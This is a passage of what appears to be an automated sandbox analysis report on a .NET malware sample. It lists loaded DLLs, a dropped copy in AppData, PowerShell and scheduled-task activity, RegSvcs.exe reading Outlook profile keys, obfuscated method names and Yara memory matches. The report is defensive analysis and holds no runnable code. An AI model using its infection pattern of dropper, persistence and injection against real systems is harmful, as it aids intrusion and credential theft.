              Source: C:\Users\user\Desktop\LEmJJ87mUQ.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Users\user\Desktop\LEmJJ87mUQ.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Users\user\Desktop\LEmJJ87mUQ.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exeSection loaded: windowscodecs.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exeSection loaded: dwrite.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exeSection loaded: textshaping.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exeSection loaded: slc.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\LEmJJ87mUQ.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Users\user\Desktop\LEmJJ87mUQ.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\OutlookJump to behavior
              Source: LEmJJ87mUQ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
              Source: LEmJJ87mUQ.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: LEmJJ87mUQ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: aWBoUwiux.exe, 00000009.00000002.2507494471.0000000006CE4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: Accessibility.pdbh source: WERB83E.tmp.dmp.16.dr
              Source: Binary string: Accessibility.pdb source: WERB83E.tmp.dmp.16.dr
              Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: aWBoUwiux.exe, 00000009.00000002.2507494471.0000000006CE4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Windows.Forms.pdbT^ source: WERB83E.tmp.dmp.16.dr
              Source: Binary string: \??\C:\Windows\exe\zdr.pdb source: aWBoUwiux.exe, 00000009.00000002.2507494471.0000000006CE4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: RegSvcs.pdb source: RegSvcs.exe, RegSvcs.exe, 00000008.00000002.2395185499.0000000000BA2000.00000002.00000001.01000000.0000000D.sdmp
              Source: Binary string: System.Xml.ni.pdbRSDS# source: WERB83E.tmp.dmp.16.dr
              Source: Binary string: n(C:\Windows\zdr.pdb5 source: aWBoUwiux.exe, 00000009.00000002.2501437622.0000000000987000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: System.Core.ni.pdb source: WERB83E.tmp.dmp.16.dr
              Source: Binary string: Microsoft.VisualBasic.pdb source: WERB83E.tmp.dmp.16.dr
              Source: Binary string: symbols\exe\zdr.pdb30&n source: aWBoUwiux.exe, 00000009.00000002.2501437622.0000000000987000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: ?&nC:\Users\user\AppData\Roaming\zdr.pdb source: aWBoUwiux.exe, 00000009.00000002.2501437622.0000000000987000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: mscorlib.ni.pdb source: WERB83E.tmp.dmp.16.dr
              Source: Binary string: \??\C:\Windows\mscorlib.pdb source: aWBoUwiux.exe, 00000009.00000002.2507494471.0000000006CE4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: zdr.pdb source: LEmJJ87mUQ.exe, aWBoUwiux.exe.0.dr, WERB83E.tmp.dmp.16.dr
              Source: Binary string: C:\Windows\zdr.pdbpdbzdr.pdb source: aWBoUwiux.exe, 00000009.00000002.2507494471.0000000006CE4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: zdr.pdbws\zdr.pdbpdbzdr.pdb\zdr.pdb source: aWBoUwiux.exe, 00000009.00000002.2501437622.0000000000987000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\symbols\exe\zdr.pdb source: aWBoUwiux.exe, 00000009.00000002.2507494471.0000000006CE4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WERB83E.tmp.dmp.16.dr
              Source: Binary string: \??\C:\Windows\symbols\dll\System.pdb source: aWBoUwiux.exe, 00000009.00000002.2507494471.0000000006CE4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Drawing.pdb( source: WERB83E.tmp.dmp.16.dr
              Source: Binary string: @&n.pdb source: aWBoUwiux.exe, 00000009.00000002.2501437622.0000000000987000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: System.Xml.ni.pdb source: WERB83E.tmp.dmp.16.dr
              Source: Binary string: System.ni.pdbRSDS source: WERB83E.tmp.dmp.16.dr
              Source: Binary string: RegSvcs.pdb, source: RegSvcs.exe, 00000008.00000002.2395185499.0000000000BA2000.00000002.00000001.01000000.0000000D.sdmp
              Source: Binary string: zdr.pdbZ source: aWBoUwiux.exe, 00000009.00000002.2501437622.0000000000987000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\exe\zdr.pdb= source: aWBoUwiux.exe, 00000009.00000002.2507494471.0000000006CE4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Configuration.ni.pdb source: WERB83E.tmp.dmp.16.dr
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: aWBoUwiux.exe, 00000009.00000002.2501621888.0000000000AC3000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: mscorlib.pdb(G source: WERB83E.tmp.dmp.16.dr
              Source: Binary string: mscorlib.ni.pdbRSDS source: WERB83E.tmp.dmp.16.dr
              Source: Binary string: \??\C:\Windows\zdr.pdbM source: aWBoUwiux.exe, 00000009.00000002.2501621888.0000000000B1B000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Configuration.pdb source: WERB83E.tmp.dmp.16.dr
              Source: Binary string: \??\C:\Windows\System.pdb source: aWBoUwiux.exe, 00000009.00000002.2507494471.0000000006CE4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Xml.pdb source: WERB83E.tmp.dmp.16.dr
              Source: Binary string: System.pdb source: aWBoUwiux.exe, 00000009.00000002.2507494471.0000000006CE4000.00000004.00000020.00020000.00000000.sdmp, WERB83E.tmp.dmp.16.dr
              Source: Binary string: System.Windows.Forms.pdb source: WERB83E.tmp.dmp.16.dr
              Source: Binary string: \??\C:\Windows\dll\System.pdb source: aWBoUwiux.exe, 00000009.00000002.2507494471.0000000006CE4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: mscorlib.pdb source: aWBoUwiux.exe, 00000009.00000002.2507494471.0000000006CE4000.00000004.00000020.00020000.00000000.sdmp, WERB83E.tmp.dmp.16.dr
              Source: Binary string: \??\C:\Windows\dll\System.pdbZ~ source: aWBoUwiux.exe, 00000009.00000002.2507494471.0000000006CE4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: aWBoUwiux.exe, 00000009.00000002.2507494471.0000000006CE4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\zdr.pdb source: aWBoUwiux.exe, 00000009.00000002.2501621888.0000000000B1B000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Drawing.pdb source: WERB83E.tmp.dmp.16.dr
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: aWBoUwiux.exe, 00000009.00000002.2507494471.0000000006CE4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Users\user\AppData\Roaming\zdr.pdb source: aWBoUwiux.exe, 00000009.00000002.2507494471.0000000006CE4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Core.pdb source: WERB83E.tmp.dmp.16.dr
              Source: Binary string: System.pdb$(,048 source: WERB83E.tmp.dmp.16.dr
              Source: Binary string: zdr.pdbSHA256T` source: LEmJJ87mUQ.exe, aWBoUwiux.exe.0.dr
              Source: Binary string: .pdb source: aWBoUwiux.exe, 00000009.00000002.2501437622.0000000000987000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Users\user\AppData\Roaming\aWBoUwiux.PDB source: aWBoUwiux.exe, 00000009.00000002.2507494471.0000000006CE4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\mscorlib.pdbu source: aWBoUwiux.exe, 00000009.00000002.2507494471.0000000006CE4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.ni.pdb source: WERB83E.tmp.dmp.16.dr
              Source: Binary string: System.Core.ni.pdbRSDS source: WERB83E.tmp.dmp.16.dr

              Data Obfuscation

              barindex
              Source: LEmJJ87mUQ.exe, Form1.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
              Source: aWBoUwiux.exe.0.dr, Form1.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
              Source: 0.2.LEmJJ87mUQ.exe.4306000.2.raw.unpack, s2abX12Byym4oB7iuy.cs.Net Code: TWCuarf0jj System.Reflection.Assembly.Load(byte[])
              Source: 0.2.LEmJJ87mUQ.exe.4361c20.1.raw.unpack, s2abX12Byym4oB7iuy.cs.Net Code: TWCuarf0jj System.Reflection.Assembly.Load(byte[])
              Source: Yara matchFile source: 9.2.aWBoUwiux.exe.39c9ed8.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.aWBoUwiux.exe.39c9ed8.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.LEmJJ87mUQ.exe.4249108.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.LEmJJ87mUQ.exe.4263128.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.LEmJJ87mUQ.exe.4263128.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.aWBoUwiux.exe.39e3ef8.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.LEmJJ87mUQ.exe.4249108.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.aWBoUwiux.exe.39e3ef8.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000002.2347808139.0000000004249000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.2504828444.00000000039E3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2347808139.0000000004263000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.2504828444.00000000039C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.2395006402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2347063114.0000000003181000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: LEmJJ87mUQ.exe PID: 5016, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 2568, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: aWBoUwiux.exe PID: 5572, type: MEMORYSTR
              Source: LEmJJ87mUQ.exeStatic PE information: 0x85E3D10F [Thu Mar 7 20:11:59 2041 UTC]
              Source: C:\Users\user\Desktop\LEmJJ87mUQ.exeCode function: 0_2_056A6E41 push 3805AC04h; iretd 0_2_056A6E4D
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00402AC0 push eax; ret 8_2_00402AD4
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00402AC0 push eax; ret 8_2_00402AFC
              Source: LEmJJ87mUQ.exeStatic PE information: section name: .text entropy: 7.647162115963495
              Source: aWBoUwiux.exe.0.drStatic PE information: section name: .text entropy: 7.647162115963495
              Source: 0.2.LEmJJ87mUQ.exe.4306000.2.raw.unpack, veJXLfyoHmFXwtyvub.csHigh entropy of concatenated method names: 'v8iwVHekCX', 'pcYw6nNUs6', 'Wkjwa4EbFU', 'gjkwOPgOWD', 'LdMw8caS8G', 'wFYwxx5HIN', 'd0gwKBoPIF', 'CsgwrOoNjR', 'b1Iwp8kVOd', 'Tu0w9A8H3f'
              Source: 0.2.LEmJJ87mUQ.exe.4306000.2.raw.unpack, krOEoKdZ175xes5hVvW.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'rPvLqvrPid', 'ntfLMLLDIF', 'XDxL307qQx', 'k6kLhYJS0L', 'UsfLFdbQFo', 'NdDLibuQZY', 'tOBLJPGp24'
              Source: 0.2.LEmJJ87mUQ.exe.4306000.2.raw.unpack, BWVXhLFpxwXuIlrnqD.csHigh entropy of concatenated method names: 'TjNQ4v6gLJ', 'u46QAoLR4P', 'LC7QqZZx1I', 'DRIQMe94kB', 'BMHQNIMUMZ', 'vbGQDnNloO', 'F1KQtogPCA', 'TopQZ18G0k', 'OppQ5g2sfD', 'i2LQ1FINK5'
              Source: 0.2.LEmJJ87mUQ.exe.4306000.2.raw.unpack, uCAHc2H8uPvOyq91xE.csHigh entropy of concatenated method names: 'o3fSY4bSR8', 'bhNSEBFh6c', 'LB3Semm0Tx', 'x1gSgMJG29', 'GSqS2oRr0a', 'JqHSwTTjRG', 'WPsSB871YT', 'pGfSPy8cF3', 'HsZSWhIjYi', 'ksPSk6AQac'
              Source: 0.2.LEmJJ87mUQ.exe.4306000.2.raw.unpack, rd0AEsXn1MeCQ1jiLQ.csHigh entropy of concatenated method names: 'aS42fUPb52', 'qbE2E7HHu5', 'hJ52g5x2jC', 'jTk2wCJV7K', 'pjw2BRcKSD', 'Y93gFsdq8Z', 'MY9giDCH2r', 'VgkgJC0Q0U', 'oGBgjIUmQZ', 'mgcgUaGysY'
              Source: 0.2.LEmJJ87mUQ.exe.4306000.2.raw.unpack, LKw1V4s2PCsbLttJoI.csHigh entropy of concatenated method names: 'yFEorGbiCC', 'EIWopFsXGC', 'AAhoHNgkDB', 'JtAoNU42UR', 'e4noteBeim', 'GgVoZE2lMq', 'HCCo1TKYms', 'Gr3o7fAqii', 'Smoo4fJHPv', 'hmso0FfSBG'
              Source: 0.2.LEmJJ87mUQ.exe.4306000.2.raw.unpack, s2abX12Byym4oB7iuy.csHigh entropy of concatenated method names: 'pO5nfPdrm3', 'RvLnY7TQW0', 'dtDnErmiG3', 'xXyner8l7g', 'YHRngQgLdq', 'Jsfn2kuRuV', 'LxDnwgb7qN', 'e6HnB9TkJm', 'YBPnPsZs6f', 'rqjnWnSQ6g'
              Source: 0.2.LEmJJ87mUQ.exe.4306000.2.raw.unpack, xlb0mPuHJiDuJuLogE.csHigh entropy of concatenated method names: 'eL8Ij6aa0e', 'LdiIbm6BZf', 'JlkSCgAffZ', 'SbrSGqBxSv', 'D2II0xmKhq', 'ADOIAPihVD', 'Hv8IcP0Xyf', 'JsTIqlbICQ', 'LtJIMsxH5N', 'yy7I3SW0nj'
              Source: 0.2.LEmJJ87mUQ.exe.4306000.2.raw.unpack, rG3ivKtFPkYayP4877.csHigh entropy of concatenated method names: 'AoNGwLuRdD', 'hsBGBEdKiK', 'j0nGWiYtI0', 'j6vGkuowhD', 'xN4GQRiqDs', 'duVGl4iTar', 'fE7ucvxtdWqVihhuLs', 'IZOHK7TQAB2X6nA8pB', 'Et6GGkrE1i', 'JE2Gnt5Lqf'
              Source: 0.2.LEmJJ87mUQ.exe.4306000.2.raw.unpack, a5vw6tPu7hcEKmEZZy.csHigh entropy of concatenated method names: 'AQyXGuUct7', 'eKXXno1YE3', 'jmkXu5EYVp', 'TngXYekLJd', 'SK7XEsDhAm', 'AroXgIKx8C', 'HdsX2dpW1v', 'WEHSJF00Bc', 'sH4SjTmHC0', 'WWVSUhmbZi'
              Source: 0.2.LEmJJ87mUQ.exe.4306000.2.raw.unpack, mKgtOOfgJSjP9ZL2Ml.csHigh entropy of concatenated method names: 'Dispose', 'WfYGUCr3e9', 'MK4RNFTZqv', 'lnQddblWij', 'MZRGbhZh0v', 'TbgGzneQYj', 'ProcessDialogKey', 'MerRCCLPhl', 'I6FRG3loMf', 'nOjRRSPvP4'
              Source: 0.2.LEmJJ87mUQ.exe.4306000.2.raw.unpack, o4ucp15D8ToPweuH8X.csHigh entropy of concatenated method names: 'hwgeOD2okP', 'f20exe5y19', 'xGherWUjkS', 'uCEepZkEYJ', 'YbbeQYE6Qo', 'LOMel319cj', 'v2meIuOOeB', 'd2heSChUpL', 'om1eXnQlUN', 'buneLNxtDb'
              Source: 0.2.LEmJJ87mUQ.exe.4306000.2.raw.unpack, vA0utDi6kalJK77o62.csHigh entropy of concatenated method names: 'ToString', 'cSDl0UZLXc', 'hVQlNLVKCI', 'TCNlDyPZUG', 'YdBlthYikk', 'HBdlZjyvfE', 'VZGl5NhByM', 'wFPl1RyHoD', 'gq0l7dQc0P', 'EQ4lsBXL09'
              Source: 0.2.LEmJJ87mUQ.exe.4306000.2.raw.unpack, I6XRnF4LP5JevZQ7NP.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'DA3RUPx6w4', 'VkPRbn50ij', 'L8eRzc3lam', 'kvunCGZE4v', 'rYwnGLdZBa', 'cnxnRlLJDX', 'zV5nn7A8dQ', 'a9BSgTji8UAfUhgACWL'
              Source: 0.2.LEmJJ87mUQ.exe.4306000.2.raw.unpack, L8Zd5QMXQQ43AtbYpO.csHigh entropy of concatenated method names: 'D3ZEqRT6BP', 'J9LEMyZaUn', 'AgOE3sNYTF', 'JjCEhLtQhP', 'RtmEFgBCGR', 'K8PEisHiMu', 'Mf7EJQrhjk', 'VwtEjWbPVM', 'G4IEUCZx04', 'BiQEbCPrMM'
              Source: 0.2.LEmJJ87mUQ.exe.4306000.2.raw.unpack, LST1w7z1Z4AxPZ1MSI.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Oj4XoQ1TjF', 'XrVXQrsHbo', 'PudXlvSAed', 'Vn1XI8csdt', 'CpCXST1tvk', 'o85XXt8OAB', 'gwlXLIob3U'
              Source: 0.2.LEmJJ87mUQ.exe.4306000.2.raw.unpack, TckNgadhVo6yQFljfHj.csHigh entropy of concatenated method names: 'MYkXVPBTOF', 'LyIX6RIy8J', 'QY8XaTnuZ6', 'YsBXObsSe0', 'RWsX8jwIxv', 'MePXxJVXXk', 'eeWXKrDVU7', 'S33Xr1R8qo', 'wBBXpMTWdY', 'nXiX9ID3rb'
              Source: 0.2.LEmJJ87mUQ.exe.4306000.2.raw.unpack, ljk4duRsWmsI2jrfts.csHigh entropy of concatenated method names: 'WtDSHY9gLf', 'sR6SNI6HY1', 'HvjSDRCmwq', 'mPgStVHUJd', 'lGZSqrm0qA', 'xJFSZQgTDI', 'Next', 'Next', 'Next', 'NextBytes'
              Source: 0.2.LEmJJ87mUQ.exe.4306000.2.raw.unpack, Sjnl6VU2hM4EhJtoFJ.csHigh entropy of concatenated method names: 'S4Bg8dM60o', 'i7IgKhmltw', 'oS0eDycI2q', 'YXIetxxQEE', 'nMweZm7e9V', 'vQye5V2ff3', 'swWe19F8kQ', 'jNie7UxT8R', 'YLbesW52i1', 'fYhe4xfgf6'
